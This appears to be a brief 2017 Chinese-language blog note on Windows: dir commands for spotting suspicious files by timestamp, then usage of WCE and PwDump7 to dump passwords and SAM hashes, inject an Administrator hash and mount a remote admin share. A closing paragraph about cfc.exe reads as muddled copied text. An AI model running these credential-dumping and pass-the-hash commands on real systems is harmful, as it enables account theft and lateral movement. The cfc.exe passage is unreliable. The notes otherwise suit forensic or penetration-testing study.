2017年9月28日 星期四

利用 dir 發現可疑檔案

method 1: (利用 find)

 dir /tc malware
2017/01/01  下午 01:32  malware

dir /a  /s /tc /od c:\ | find "2017/01/01 下午 01:3"  (time range)

dir /a  /s /tc /o-d c:\windows\system32 |more

*************************************************
use wce.exe and PwDump7.exe

wce.exe
wce.exe -w

PwDump7.exe
Administrator:500:xxxx

wce.exe -s Administrator:test:xxxx

net use \\test\c$

Windows Credentials Editor (WCE) is a security tool to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets).

We have developed a new password dumper for windows named PWDUMP7. The main difference between pwdump7 and other pwdump tools is that our tool runs by extracting the binary SAM and SYSTEM File from the Filesystem and then the hashes are extracted. For that task Rkdetector NTFS and FAT32 filesystem drivers are used.

Pwdump 7 for Windows
Pwdump7 is also able to extract passwords offline by selecting the target files.


*************************************************
cfc.exe is a product CompFileChecker with H.KINOSHITA company,it version is 0.0.2.0,size is 609792. cfc.exe virus or errors should be disabled and removed if it was attacked and brought you windows xp/vista/7/windows 10 errors.

cfc.exe algx.exe c:\windows\winhelp.exe



沒有留言:

張貼留言